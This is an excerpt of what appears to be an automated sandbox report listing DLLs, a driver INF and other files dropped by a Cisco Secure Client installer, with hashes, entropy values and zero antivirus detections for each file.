                                                                                                                                      SSDEEP:6144:8UBgEIe9ncUGQljr+1x87dfK8k9rqXsPNcJESSFCejFp:rFyUIP8Hk9rpcJEmev
                                                                                                                                      MD5:CE72AE5437229CC4EAB1FCE6C2B10555
                                                                                                                                      SHA1:46177D24E1CC592FB31F3B9A88F7A4CCF5B4D742
                                                                                                                                      SHA-256:24C42AD6CC70A169AFE6232E87E94BB4DC7ADC64A1C58A2A7565D28171E1AED0
                                                                                                                                      SHA-512:282751765E46AC037E13E4FA0DFC34ECF8D5FD08B7358775E55F44D91B4267A38B3345095C180DDDCCBADFD6645D05744F1E3109BAF84678125A51D6DE6A1955
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):486504
                                                                                                                                      Entropy (8bit):6.862184684725985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:cxog6V56WiNYPTL0x+/OB7hiCM/JFJQtqx:cxo/V56WiyPhe7kCM/fJQt0
                                                                                                                                      MD5:B5206EC55DD02AA88783189589F72953
                                                                                                                                      SHA1:F8180A92BEFAF78EED660435425B1B0B97BFA730
                                                                                                                                      SHA-256:F6F22F6C9A31CB561E69D5D5892EAA4A44A51FCF36AB27841A00AA07E33ABD68
                                                                                                                                      SHA-512:4A117F579A3BABBB7C6CF8072671E1363BEB63869030A2D0B376BBEFA448F88CC2CAED6F17026A5AB34A8E3E9B3EEF80DD8BD2441FAAF70D13F917DDA9FB8BAB
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):912488
                                                                                                                                      Entropy (8bit):6.783823890055007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:hzaSwCkln20SXQK4RjiqKSehi15NeM1+uFTXqNK+FrZeqQFXpB:h+SwCkl20VLipi15NeM1+oTorjoB
                                                                                                                                      MD5:2DAB87822AC2A484AC9D28D9BEEA60DC
                                                                                                                                      SHA1:F49F17CD267325EDC70651940E3322E602ECBF63
                                                                                                                                      SHA-256:88549D168B1062176C09C20A6A264432792A9C3DD291EBB34DDAA16E0C822CCA
                                                                                                                                      SHA-512:AB8F79AD1AF50D1537E288D5A1E36D65A2463C5F77113E02770DE85BA7058C6054EDC82165D14A061D151CA40D5128C88B9D314635E540D3439B2D8B407ABD42
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11144
                                                                                                                                      Entropy (8bit):7.2926694421063205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RCFWAyKfdF3Ee2yKO3FWQFBacRSp0X01k9z3AJEx0ALqf:kTb3FR+cR00R9zoE6A+f
                                                                                                                                      MD5:606BE87B926A7967C1B822260307544F
                                                                                                                                      SHA1:256B68497E3C942D5545A73FEF4AB4575D4A6BEE
                                                                                                                                      SHA-256:8B8A4129AD0745ABE9C05BBC36C3C4F97B85C97ECADFC884B6FFBDB5CCEA7B33
                                                                                                                                      SHA-512:4FBD62B00CD6D5948ACB32FA2250A44C6B6370CAA4CCD9FD5BDCC0FB7B9FA746BF8F1F03C6A7870F815037CAC47D737EAF1A7A77A48D74358D054321BB3B5690
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1898
                                                                                                                                      Entropy (8bit):5.184476593945747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                      MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                      SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                      SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                      SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):305568
                                                                                                                                      Entropy (8bit):6.508762969375985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:RU6viRkqf6rRsLewEo2eCf4nkra75QtUNxNad3fv27/iTf7G/:RU6viRkqf6rRsLew/23Qkro7x4Vfvwd/
                                                                                                                                      MD5:7119F4B20ECBF6BBB4478A983D34AC70
                                                                                                                                      SHA1:60C6E6B2EF96C540318FBEDEDF81F5D8BD90148E
                                                                                                                                      SHA-256:372D4C634E9C8F1DA8EE0ED5DD54E4D2956564FF7FCF62CDEF20689D2EC47F92
                                                                                                                                      SHA-512:5895F370D1641611BB110D75AADA34DC34359DA83143FE067BB8DD99CCBAB64B832BA7B958C3F09D81B78E3ABBD4601A495BD51070C053D298E7A48745CEC0BC
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):92776
                                                                                                                                      Entropy (8bit):6.652577402747044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JXrBoBxhQlrylel5aThWE7amOMjhO5qg9WyVPDNxsU2xS:JXri65Dl67apMjw5qg9WyB1
                                                                                                                                      MD5:448338FE18DD5BF4F6C6B87203E5ADBA
                                                                                                                                      SHA1:3095A3A7866188806898F5A366E05C53C9AF9788
                                                                                                                                      SHA-256:557F2E566FCA90B4BF853F30130EDB15EE675B76B94377ECF81792EEAA3A2690
                                                                                                                                      SHA-512:13FBEA608AEDEC472419901B6B265608070E5ADBAACFBA71091680B86A4FE0F22564AB01C6DEB283CC501BBE96F12F9196798DF263FC60C828078C66B4D18FA3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):624232
                                                                                                                                      Entropy (8bit):6.548375643467659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:XaEbYc+L1pQ1aE6Qo+gbEXefqR5nB3naFKMwKKbtxbZ6+XZdtbjmb2gOb/vBUbyk:XaEbYc+LUtB3ZssEiqYfQQEvFBEfI+Q
                                                                                                                                      MD5:1536EB035B356121711182E1A3413658
                                                                                                                                      SHA1:D188D4ABF1FFA6C7E577D9AD3FDCF1ED57C6BD85
                                                                                                                                      SHA-256:DD600CEDE829CFBE9E1B5B2F1B35219294654C19DC4E9E208CFCF6DF71F2B957
                                                                                                                                      SHA-512:049CA3075D2BE2E0DD3FFD59C5C7EE0A417D3565ED53E9E589CFF7E68AE8E34C91824A97EC6C1C6E0139D4DF485906632E066CC21805FBB299E3FBB1E11A568E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45672
                                                                                                                                      Entropy (8bit):6.909278775883234
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kD0B4emSfS7QU1+oZYDGV5ENAMxfwDGV/vUAMxkEr:ce8+oixfRKx/
                                                                                                                                      MD5:F9E23973D3BF6B1A6ECAD723B07FDDD1
                                                                                                                                      SHA1:958C2BBF7D86C8B4527DA5082A4BA3428465031D
                                                                                                                                      SHA-256:9990F20DAA97C9502D6E056EE81E2B8815AF9DAF52A2E22B95A3CCB00C6BA332
                                                                                                                                      SHA-512:48A36927B69443DE27EEE9FFF3D84E06DB6BB050B62A4CE2AC3014362B7BA119648294578545FA48BC95D497FAE1D99D010AA5A1AD78E9C8F15D09F427CE66E5
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):61032
                                                                                                                                      Entropy (8bit):6.808659945563971
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:8G+TDeIz+avSPNWxdk8uSDmzItwhHXWT2nLHSJDGV5ENAMxaqydDGVDyAMxkEku:8veOAidk8uSRGWCelxaq/QxV
                                                                                                                                      MD5:4181824994B367CABC348F8E308DD792
                                                                                                                                      SHA1:3C4508092416D6BB68F2BED15BCBA578294FDFE3
                                                                                                                                      SHA-256:AC91D41BDC0EA04E56D2EED724EB487B59E920F59B1E24440F5A3AED11B4E8C4
                                                                                                                                      SHA-512:C802E372F6886F968BEE9DC6AD512F0DAA666C0632AF5EAEA63605733749D718879202BA8C9225BDD083D24B079B110ED37A2B1E9AD868AEF149B122703D2177
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):126568
                                                                                                                                      Entropy (8bit):6.722288477011462
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:gGGKu/VLwQR1ky0vAF2/Fk5kIEFor6SVTdUT75VU:gGGKu/VLwYIAA++9ohVpUf5VU
                                                                                                                                      MD5:23F1917EF17DB9B94F4E4FFBE56320FB
                                                                                                                                      SHA1:964967CCBB8AEE664E8294B39E72A608C17B41A0
                                                                                                                                      SHA-256:0E48269187B4D99FC892B373EA247A48E852F71792F5F28E30001C509B8A3971
                                                                                                                                      SHA-512:ACCAC7B61E6D18662E1FF702D41052F519EE029FE4820185168B5CDF7049526DD28B43F0A84C1FFB8E2C0E1AE933D351EF9CB6AE9D410F1C312FA5DB01127120
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37992
                                                                                                                                      Entropy (8bit):6.96957396675789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kkB1x1cnnFDRhUtUMquc51DGV5ENAMxD26DGVkDAMxkEjb:x1LcnFFWRvcnxD3jxvb
                                                                                                                                      MD5:D10B79B1F82E60C76CB92B91DB45D3AB
                                                                                                                                      SHA1:19739B47088E76EDB8724D19A66BF4416C96CCED
                                                                                                                                      SHA-256:F9F4B8E1C40557F06A5426A83D3423C57E75EE02938392984D478F155F13BDFC
                                                                                                                                      SHA-512:4A337B08446DA741844436268B971ED83ADA00FE0A184D9C228382565F0B694C185D6BECBF7350EFC2363813F3E0EDC77F7D5C70CBB436CC58C103C8E782F844
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):97384
                                                                                                                                      Entropy (8bit):6.671284905085064
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uqA5yIFN6BM8oAb7KgcvteBM53LZLux2ZXcpXNmzoPd0y+oo49FxyrPxTq:05yIFIM8pbeteBMXNZXI0y+oo4P
                                                                                                                                      MD5:7E67C939282B7893B1FC6624F7BE497E
                                                                                                                                      SHA1:E38043283573321310A9028EDAA4CC5E79C0B033
                                                                                                                                      SHA-256:5263F59556A66F4837D866BDD3C81D4D552811DDF554F76AB64902D3A5486D8E
                                                                                                                                      SHA-512:014DE12B5EAE20091F99256C381272B3323284FD5D8014E740FE3FA4C27B9F7449AE29D91E196BE3FE7E903B887B6BE03889B7A7F8312640AF5228C33B15063A
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):411752
                                                                                                                                      Entropy (8bit):6.881611330499658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                      MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                      SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                      SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                      SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):243576
                                                                                                                                      Entropy (8bit):6.63219267320993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:aLy1UNAZHA2nSG5LbEcutDsSaqiOHYb836TLLOeHFQyS9uLms12z/NpJ9yne:2hkH0Yb83KLxmuLmdzoe
                                                                                                                                      MD5:9AD549C121108B3B1408A30BEE325D08
                                                                                                                                      SHA1:898FFC728087861E619DABABD8E65CC902276D06
                                                                                                                                      SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                                                                                                                                      SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1035368
                                                                                                                                      Entropy (8bit):6.730008187623686
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:zx1d5ucCv/+XrPAQ/gL+EIK6bs6l7HNLM8RL45fvfmY3YrA0RFZa:z5iH+T/9y6I69HNLM8d45ZYrtRLa
                                                                                                                                      MD5:1987D72B9C16314FC1BDEC8315AA31B4
                                                                                                                                      SHA1:55BA31FA638F3EF505D450DAAFF5F2E6EFBB59A9
                                                                                                                                      SHA-256:CABF64B736A3217E51FE4F49DC164C2CB5218D03F05AE4B932C7D362AB5A2CFD
                                                                                                                                      SHA-512:417993511DFCACD266D459ED0B7204327D6B488F9A338C06090D81036D9B1A3D24F87E2251447F74CA655F5E234D57DF0685C45458FFDB47EB246B6E2E2E9692
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):61032
                                                                                                                                      Entropy (8bit):6.808659945563971
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:8G+TDeIz+avSPNWxdk8uSDmzItwhHXWT2nLHSJDGV5ENAMxaqydDGVDyAMxkEku:8veOAidk8uSRGWCelxaq/QxV
                                                                                                                                      MD5:4181824994B367CABC348F8E308DD792
                                                                                                                                      SHA1:3C4508092416D6BB68F2BED15BCBA578294FDFE3
                                                                                                                                      SHA-256:AC91D41BDC0EA04E56D2EED724EB487B59E920F59B1E24440F5A3AED11B4E8C4
                                                                                                                                      SHA-512:C802E372F6886F968BEE9DC6AD512F0DAA666C0632AF5EAEA63605733749D718879202BA8C9225BDD083D24B079B110ED37A2B1E9AD868AEF149B122703D2177
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347752
                                                                                                                                      Entropy (8bit):6.708372875308561
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:xS6/w5Vk2RM0ZdTNd5JYjV7JYwXhik4QNEN519X+Iw99Itmf:xS5Vk2RtZw5JYwXhpzyNttg
                                                                                                                                      MD5:84EB38D113F69752F45B9A1852536093
                                                                                                                                      SHA1:D24161590E4C7541D183A0871694DEFE92F81783
                                                                                                                                      SHA-256:276C98884E9945BC79AB4D84069CFE543752FBD064E88EE78DE0256F8B1DF374
                                                                                                                                      SHA-512:0B69B29809915DFC348AD36E528BE4DE5E251F30AA7E3FA1017F1F3A24FF315C4F5290423D15C62AA3E4F3AFA573362675177EC05E48B78FA2995C2D5F5BD310
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):486504
                                                                                                                                      Entropy (8bit):6.862184684725985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:cxog6V56WiNYPTL0x+/OB7hiCM/JFJQtqx:cxo/V56WiyPhe7kCM/fJQt0
                                                                                                                                      MD5:B5206EC55DD02AA88783189589F72953
                                                                                                                                      SHA1:F8180A92BEFAF78EED660435425B1B0B97BFA730
                                                                                                                                      SHA-256:F6F22F6C9A31CB561E69D5D5892EAA4A44A51FCF36AB27841A00AA07E33ABD68
                                                                                                                                      SHA-512:4A117F579A3BABBB7C6CF8072671E1363BEB63869030A2D0B376BBEFA448F88CC2CAED6F17026A5AB34A8E3E9B3EEF80DD8BD2441FAAF70D13F917DDA9FB8BAB
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37992
                                                                                                                                      Entropy (8bit):6.96957396675789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kkB1x1cnnFDRhUtUMquc51DGV5ENAMxD26DGVkDAMxkEjb:x1LcnFFWRvcnxD3jxvb
                                                                                                                                      MD5:D10B79B1F82E60C76CB92B91DB45D3AB
                                                                                                                                      SHA1:19739B47088E76EDB8724D19A66BF4416C96CCED
                                                                                                                                      SHA-256:F9F4B8E1C40557F06A5426A83D3423C57E75EE02938392984D478F155F13BDFC
                                                                                                                                      SHA-512:4A337B08446DA741844436268B971ED83ADA00FE0A184D9C228382565F0B694C185D6BECBF7350EFC2363813F3E0EDC77F7D5C70CBB436CC58C103C8E782F844
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):411752
                                                                                                                                      Entropy (8bit):6.881611330499658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                      MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                      SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                      SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                      SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1898
                                                                                                                                      Entropy (8bit):5.184476593945747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                      MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                      SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                      SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                      SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):286824
                                                                                                                                      Entropy (8bit):6.617095335993768
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                      MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                      SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                      SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                      SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):912488
                                                                                                                                      Entropy (8bit):6.783823890055007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:hzaSwCkln20SXQK4RjiqKSehi15NeM1+uFTXqNK+FrZeqQFXpB:h+SwCkl20VLipi15NeM1+oTorjoB
                                                                                                                                      MD5:2DAB87822AC2A484AC9D28D9BEEA60DC
                                                                                                                                      SHA1:F49F17CD267325EDC70651940E3322E602ECBF63
                                                                                                                                      SHA-256:88549D168B1062176C09C20A6A264432792A9C3DD291EBB34DDAA16E0C822CCA
                                                                                                                                      SHA-512:AB8F79AD1AF50D1537E288D5A1E36D65A2463C5F77113E02770DE85BA7058C6054EDC82165D14A061D151CA40D5128C88B9D314635E540D3439B2D8B407ABD42
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1865320
                                                                                                                                      Entropy (8bit):6.970258455602142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                      MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                      SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
                                                                                                                                      SHA-256:09EF0662458A6B07BC5B063576981CACF74E7E7B3FD355FF6EF49395A8D95183
                                                                                                                                      SHA-512:891731F36B327E2B33AC31C39E869D8FE4CB4A7B289F3183857A0671C5DACA700552A5EAF29A07AC537330B57A0C45DC27DDE8AA5B7AC33C9F8A6F8E9B1EE968
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45672
                                                                                                                                      Entropy (8bit):6.909278775883234
                                                                                                                                      Encrypted:false
